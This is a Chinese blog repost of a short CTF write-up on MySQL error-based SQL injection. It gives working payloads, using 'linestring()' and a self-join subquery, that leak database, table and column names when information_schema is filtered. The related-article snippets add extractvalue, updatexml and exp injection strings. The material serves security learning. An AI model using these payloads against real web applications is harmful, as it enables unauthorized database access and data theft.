报错注入小技巧

最新推荐文章于 2024-04-20 17:20:03 发布
最新推荐文章于 2024-04-20 17:20:03 发布
阅读量172 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/wangshuwin/p/7867873.html
版权

这次Lctf看到pcat大佬的报错方法,就记录一下

这个题是把database,table,information这些都过滤了所以没法查infomation_schema查数据

所以这道题就用了select * from users where username='admin' and linestring(username);(linestring是Mysql自带的空间索引函数用来索引列名,还有一个函数也有这个效果polygon)这个语句进行报错。linestring(字段名)效果是这样的

1063328-20171120192549961-1206873524.png

可以看到很方便的就把数据库名和表名给爆出来了,而且这个函数通常不怎么会禁用而且这个语句配合/,%,=等连接符依然可以使用。以后报错的时候又多了一种思路,当然弊端就是你必须知道字段名。

接下来的可以用这个语句报错注入select * from users where username='admin' and (select * from(select * from cklm.users a join cklm.users b using(username))c);这个语句可以把username这个字段进行爆出来

1063328-20171120192619196-454356289.png

然后select * from users where username='admin' and (select * from(select * from cklm.users a join cklm.users b using(username,password))c);这样可以依次爆出剩下的字段

转载于:https://www.cnblogs.com/wangshuwin/p/7867873.html

aihuochou9723
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
报错注入
qq_39298901的博客
02-17 663
一、简介 ​ 报错注入有12种,分别是:floor报错、ExtractValue报错、UpdateXml报错、NAME_CONST报错、join报错、exp报错、GeometryCollection报错、polygon报错、multipoint报错、multlinestring报错、multpolygon报错、linestring报错。本文将探究基于floor的sql报错注入,介绍其原理及利用方法。 二、相关函数 ​ 在讲原理之前我们需要先了解一下相关sql语句以及几个sql函数的知识,然后对才能对原理理.
关于SQL注入的一些技巧分享
weixin_30345577的博客
12-29 161
先上一道简单的ctf注入题: 一道利用order by进行注入的ctf题 很不错的一道利用order by的注入题,之前不知道order by除了爆字段还有这种操作。 原题地址:http://chall.tasteless.eu/level1/index.php?dir= 直接进去dir后的参数是ASC,网页上有从1~10编号的10条信息。绕了一大圈反应出是order by后...
报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例(2)
最新发布
2401_83946284的博客
04-20 584
适用情况:页面有数据库的报错信息报错信息必须是动态的、来自数据库的报错信息。网站写死的、自定义的报错提示不算。## 学习路线:这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:![在这里插入图片描述](https://img-blog.csdnimg.cn/7a04c5d629f1415a9e35662316578e07.png#pic_center)
web-报错注入-皮卡丘靶场
07-15
皮卡丘靶场的几种报错注入
第六节 GET报错注入-01
09-15
第六节 GET报错注入-01
MySQL五种报错注入1
08-04
MySQL五种报错注入/*数据库版本*//*简单办法暴库*//*连接用户*//*连接数据库*//*暴库*//*暴表*//*暴字段*//*暴内容*/2、Extra
聊聊错误注入技巧
走在前往架构师的路上
02-26 6335
前言什么是“错误注入”?错误注入指的是将错误引入到我们的程序中。可能有人会很好奇,这么做有什么目的呢?答案很简单:程序的测试。因为在很多时候,当我们要进行边缘情况测试的时候,往往模拟测试的场景不是非常好造的(尤其是分布式类的程序更是如此),这个时候,我们需要有快捷的方式将错误注入到程序中,以便在我们需要发生错误时,进行错误的产生。本文笔者将结合HDFS现有的错误注入方法来介绍此部分内容。错误注入技术
SQL报错注入
buffedon的博客
05-16 229
报错注入 原理 数据库的原始报错信息被直接打印在屏幕中。 报错注入函数 1. extractvalue() id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))) 2. updatexml() id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) 3. exp() id=1 and exp(~(select * from(select user())a)) 流程 lim
SQL注入-报错注入
LJH1999ZN的博客
02-09 9812
sql注入之报错注入的演示与介绍
SQL注入之报错注入
帅醉了的博客
03-03 1186
0x00_报错注入原理 构造报错payload让信息通过报错信息回显出来。在查询不回现内容,会答应错误信息。Update、insert等语句,会打印错误信息。 0x01_报错注入操作 floor()报错注入 mysql模板: concat:连接字符串功能 floor:去整数值 rand:取0~1之间的随机浮点值 group by:根据一个或多个列对结果集进行分组并有排序功能 select coun...
SQL注入---报错注入
qq_41592307的博客
09-03 299
报错注入 1、报错注入的原理 由于后台没有对报错信息进行过滤,报错信息会显示在前端,可以使用指定的函数来制造报错,由 此来获取数据信息。 2、报错函数 extractvalue(xml_frag,xpath_expr):对XML文档数据进行查询的XPATH函数 如果Xpath的输入错误,则会将错误信息结果显示在前端。 注:extractvalue()和updatexml()函数查询的最大长度为32位,如果超过32位则需要使用 substring()函数截取 ...
SQL注入中的报错注入
04-05
报错注入是一种利用SQL语句执行错误信息来获取数据库信息的注入方式。攻击者通过构造恶意的SQL语句,使得数据库在执行该语句时出现错误,从而返回错误信息。通过分析错误信息,攻击者可以获取数据库的结构和数据信息...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值